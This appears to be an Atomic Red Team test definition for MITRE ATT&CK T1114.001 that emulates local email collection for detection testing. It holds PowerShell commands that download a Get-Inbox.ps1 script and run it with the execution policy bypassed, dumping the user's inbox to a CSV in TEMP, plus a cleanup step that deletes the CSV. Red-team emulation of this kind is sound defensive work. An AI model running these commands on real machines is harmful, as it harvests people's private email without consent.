#TechniqueName: Email Collection: Local Email Collection
#AtomicTestName: Email Collection with PowerShell Get-Inbox
#Language: ps1

#get_prereq_commands
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "PathToAtomicsFolder\T1114.001\src\Get-Inbox.ps1"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1114.001\src\Get-Inbox.ps1) {exit 0} else {exit 1}


#commands
powershell -executionpolicy bypass -command PathToAtomicsFolder\T1114.001\src\Get-Inbox.ps1 -file $env:TEMP\mail.csv


#cleanup_commands
Remove-Item $env:TEMP\mail.csv -Force -ErrorAction Ignore

